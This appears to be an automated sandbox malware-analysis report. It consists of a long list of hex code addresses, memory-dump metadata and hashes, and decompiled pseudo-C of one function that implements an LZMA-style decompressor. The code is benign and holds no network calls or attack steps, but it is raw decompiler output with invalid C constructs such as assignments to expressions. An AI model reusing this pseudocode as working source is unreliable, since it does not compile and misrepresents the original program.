                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406c71
                                                              0x00406c75
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c7b
                                                              0x00406c7f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c85
                                                              0x00406c87
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8e
                                                              0x00406c92
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ce2
                                                              0x00406ce6
                                                              0x00406ced
                                                              0x00406cf0
                                                              0x00406cf3
                                                              0x00406cfd
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406ce8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d09
                                                              0x00406d0d
                                                              0x00406d14
                                                              0x00406d17
                                                              0x00406d1a
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d1d
                                                              0x00406d20
                                                              0x00406d23
                                                              0x00406d23
                                                              0x00406d26
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d36
                                                              0x00406d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00406dc9
                                                              0x00406dc9
                                                              0x00406dcd
                                                              0x0040716b
                                                              0x00000000
                                                              0x0040716b
                                                              0x00406dd3
                                                              0x00406dd6
                                                              0x00406dd9
                                                              0x00406ddd
                                                              0x00406de0
                                                              0x00406de6
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406deb
                                                              0x00406dee
                                                              0x00000000
                                                              0x00000000
                                                              0x004069be
                                                              0x004069be
                                                              0x004069c2
                                                              0x0040712f
                                                              0x00000000
                                                              0x0040712f
                                                              0x004069c8
                                                              0x004069cb
                                                              0x004069ce
                                                              0x004069d2
                                                              0x004069d5
                                                              0x004069db
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069e0
                                                              0x004069e3
                                                              0x004069e3
                                                              0x004069e6
                                                              0x004069e9
                                                              0x00000000
                                                              0x00000000
                                                              0x004069ef
                                                              0x004069f5
                                                              0x00000000
                                                              0x00000000
                                                              0x004069fb
                                                              0x004069fb
                                                              0x004069ff
                                                              0x00406a02
                                                              0x00406a05
                                                              0x00406a08
                                                              0x00406a0b
                                                              0x00406a0c
                                                              0x00406a0f
                                                              0x00406a11
                                                              0x00406a17
                                                              0x00406a1a
                                                              0x00406a1d
                                                              0x00406a20
                                                              0x00406a23
                                                              0x00406a26
                                                              0x00406a29
                                                              0x00406a45
                                                              0x00406a48
                                                              0x00406a4b
                                                              0x00406a4e
                                                              0x00406a55
                                                              0x00406a59
                                                              0x00406a5b
                                                              0x00406a5f
                                                              0x00406a2b
                                                              0x00406a2b
                                                              0x00406a2f
                                                              0x00406a37
                                                              0x00406a3c
                                                              0x00406a3e
                                                              0x00406a40
                                                              0x00406a40
                                                              0x00406a62
                                                              0x00406a69
                                                              0x00406a6c
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a77
                                                              0x00406a77
                                                              0x00406a7b
                                                              0x0040713b
                                                              0x00000000
                                                              0x0040713b
                                                              0x00406a81
                                                              0x00406a84
                                                              0x00406a87
                                                              0x00406a8b
                                                              0x00406a8e
                                                              0x00406a94
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406aa2
                                                              0x00000000
                                                              0x00000000
                                                              0x00406aa4
                                                              0x00406aa7
                                                              0x00406aaa
                                                              0x00406aad
                                                              0x00406ab0
                                                              0x00406ab3
                                                              0x00406ab6
                                                              0x00406ab9
                                                              0x00406abc
                                                              0x00406abf
                                                              0x00406ac2
                                                              0x00406ada
                                                              0x00406add
                                                              0x00406ae0
                                                              0x00406ae3
                                                              0x00406ae3
                                                              0x00406ae6
                                                              0x00406aea
                                                              0x00406aec
                                                              0x00406ac4
                                                              0x00406ac4
                                                              0x00406acc
                                                              0x00406ad1
                                                              0x00406ad3
                                                              0x00406ad5
                                                              0x00406ad5
                                                              0x00406aef
                                                              0x00406af6
                                                              0x00406af9
                                                              0x00000000
                                                              0x00406afb
                                                              0x00000000
                                                              0x00406afb
                                                              0x00406af9
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b3b
                                                              0x00406b3b
                                                              0x00406b3f
                                                              0x00407147
                                                              0x00000000
                                                              0x00407147
                                                              0x00406b45
                                                              0x00406b48
                                                              0x00406b4b
                                                              0x00406b4f
                                                              0x00406b52
                                                              0x00406b58
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5d
                                                              0x00406b60
                                                              0x00406b60
                                                              0x00406b66
                                                              0x00406b04
                                                              0x00406b04
                                                              0x00406b07
                                                              0x00000000
                                                              0x00406b07
                                                              0x00406b68
                                                              0x00406b68
                                                              0x00406b6b
                                                              0x00406b6e
                                                              0x00406b71
                                                              0x00406b74
                                                              0x00406b77
                                                              0x00406b7a
                                                              0x00406b7d
                                                              0x00406b80
                                                              0x00406b83
                                                              0x00406b86
                                                              0x00406b9e
                                                              0x00406ba1
                                                              0x00406ba4
                                                              0x00406ba7
                                                              0x00406ba7
                                                              0x00406baa
                                                              0x00406bae
                                                              0x00406bb0
                                                              0x00406b88
                                                              0x00406b88
                                                              0x00406b90
                                                              0x00406b95
                                                              0x00406b97
                                                              0x00406b99
                                                              0x00406b99
                                                              0x00406bb3
                                                              0x00406bba
                                                              0x00406bbd
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406e4c
                                                              0x00406e4c
                                                              0x00406e50
                                                              0x00407177
                                                              0x00000000
                                                              0x00407177
                                                              0x00406e56
                                                              0x00406e59
                                                              0x00406e5c
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e69
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c1c
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f5b
                                                              0x00406f5f
                                                              0x00406f81
                                                              0x00406f84
                                                              0x00406f8e
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f61
                                                              0x00406f64
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6b
                                                              0x00406f6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407018
                                                              0x0040701c
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x00407041
                                                              0x00407048
                                                              0x0040704f
                                                              0x0040704f
                                                              0x00000000
                                                              0x0040704f
                                                              0x0040701e
                                                              0x00407021
                                                              0x00407024
                                                              0x00407027
                                                              0x0040702e
                                                              0x00406f72
                                                              0x00406f72
                                                              0x00406f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00407109
                                                              0x0040710c
                                                              0x0040700d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d43
                                                              0x00406d45
                                                              0x00406d4c
                                                              0x00406d4d
                                                              0x00406d4f
                                                              0x00406d52
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5a
                                                              0x00406d5d
                                                              0x00406d60
                                                              0x00406d62
                                                              0x00406d64
                                                              0x00406d64
                                                              0x00406d65
                                                              0x00406d68
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d80
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x00000000
                                                              0x00000000
                                                              0x00407065
                                                              0x00407065
                                                              0x00407069
                                                              0x004071a1
                                                              0x00000000
                                                              0x004071a1
                                                              0x0040706f
                                                              0x00407072
                                                              0x00407075
                                                              0x00407079
                                                              0x0040707c
                                                              0x00407082
                                                              0x00407084
                                                              0x00407084
                                                              0x00407084
                                                              0x00407087
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708d
                                                              0x0040708d
                                                              0x00407091
                                                              0x004070f1
                                                              0x004070f4
                                                              0x004070f9
                                                              0x004070fa
                                                              0x004070fc
                                                              0x004070fe
                                                              0x00407101
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x00407013
                                                              0x0040700d
                                                              0x00407093
                                                              0x00407099
                                                              0x0040709c
                                                              0x0040709f
                                                              0x004070a2
                                                              0x004070a5
                                                              0x004070a8
                                                              0x004070ab
                                                              0x004070ae
                                                              0x004070b1
                                                              0x004070b4
                                                              0x004070cd
                                                              0x004070d0
                                                              0x004070d3
                                                              0x004070d6
                                                              0x004070da
                                                              0x004070dc
                                                              0x004070dc
                                                              0x004070dd
                                                              0x004070e0
                                                              0x004070b6
                                                              0x004070b6
                                                              0x004070be
                                                              0x004070c3
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070c8
                                                              0x004070e3
                                                              0x004070ea
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x00406d88
                                                              0x00406d8b
                                                              0x00406dc1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef4
                                                              0x00406ef4
                                                              0x00406ef7
                                                              0x00406ef9
                                                              0x00407183
                                                              0x00000000
                                                              0x00407183
                                                              0x00406eff
                                                              0x00406f02
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f08
                                                              0x00406f0c
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00000000
                                                              0x00406f0f
                                                              0x00406d8d
                                                              0x00406d8f
                                                              0x00406d91
                                                              0x00406d93
                                                              0x00406d96
                                                              0x00406d97
                                                              0x00406d99
                                                              0x00406d9b
                                                              0x00406d9e
                                                              0x00406da1
                                                              0x00406db7
                                                              0x00406dbc
                                                              0x00406df4
                                                              0x00406df4
                                                              0x00406df8
                                                              0x00406e24
                                                              0x00406e26
                                                              0x00406e2d
                                                              0x00406e30
                                                              0x00406e33
                                                              0x00406e33
                                                              0x00406e38
                                                              0x00406e38
                                                              0x00406e3a
                                                              0x00406e3d
                                                              0x00406e44
                                                              0x00406e47
                                                              0x00406e74
                                                              0x00406e74
                                                              0x00406e77
                                                              0x00406e7a
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00000000
                                                              0x00406eee
                                                              0x00406e7c
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8b
                                                              0x00406e8e
                                                              0x00406e91
                                                              0x00406e94
                                                              0x00406e97
                                                              0x00406e9a
                                                              0x00406e9d
                                                              0x00406eb6
                                                              0x00406eb8
                                                              0x00406ebb
                                                              0x00406ebc
                                                              0x00406ebf
                                                              0x00406ec1
                                                              0x00406ec4
                                                              0x00406ec6
                                                              0x00406ec8
                                                              0x00406ecb
                                                              0x00406ecd
                                                              0x00406ed0
                                                              0x00406ed4
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed7
                                                              0x00406eda
                                                              0x00406edd
                                                              0x00406e9f
                                                              0x00406e9f
                                                              0x00406ea7
                                                              0x00406eac
                                                              0x00406eae
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406ee0
                                                              0x00406ee7
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee7
                                                              0x00406dfa
                                                              0x00406dfd
                                                              0x00406dff
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0a
                                                              0x00406e0d
                                                              0x00406e10
                                                              0x00406e10
                                                              0x00406e13
                                                              0x00406e13
                                                              0x00406e16
                                                              0x00406e1d
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1d
                                                              0x00406da3
                                                              0x00406da6
                                                              0x00406da8
                                                              0x00406dab
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b0a
                                                              0x00406b0a
                                                              0x00406b0e
                                                              0x00407153
                                                              0x00000000
                                                              0x00407153
                                                              0x00406b14
                                                              0x00406b17
                                                              0x00406b1a
                                                              0x00406b1d
                                                              0x00406b20
                                                              0x00406b23
                                                              0x00406b26
                                                              0x00406b28
                                                              0x00406b2b
                                                              0x00406b2e
                                                              0x00406b31
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c95
                                                              0x00406c95
                                                              0x00406c99
                                                              0x0040715f
                                                              0x00000000
                                                              0x0040715f
                                                              0x00406c9f
                                                              0x00406ca2
                                                              0x00406ca5
                                                              0x00406ca8
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406cad
                                                              0x00406cb0
                                                              0x00406cb3
                                                              0x00406cb6
                                                              0x00406cb9
                                                              0x00406cbc
                                                              0x00406cbd
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cc2
                                                              0x00406cc5
                                                              0x00406cc8
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406cce
                                                              0x00406cd0
                                                              0x00406cd0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f16
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f1c
                                                              0x00406f1f
                                                              0x00406f22
                                                              0x00406f25
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f2a
                                                              0x00406f2d
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406f36
                                                              0x00406f39
                                                              0x00406f3a
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3f
                                                              0x00406f42
                                                              0x00406f45
                                                              0x00406f48
                                                              0x00406f4b
                                                              0x00406f4f
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00000000
                                                              0x00406f56
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x00000000
                                                              0x00406cd3
                                                              0x00406f54
                                                              0x00407189
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x004071c0
                                                              0x004071c0
                                                              0x00000000
                                                              0x004071c0
                                                              0x0040700d
                                                              0x00406f94
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406bc8

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                                              • Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
                                                              • Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                                              • Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406CE2, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406CE2() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
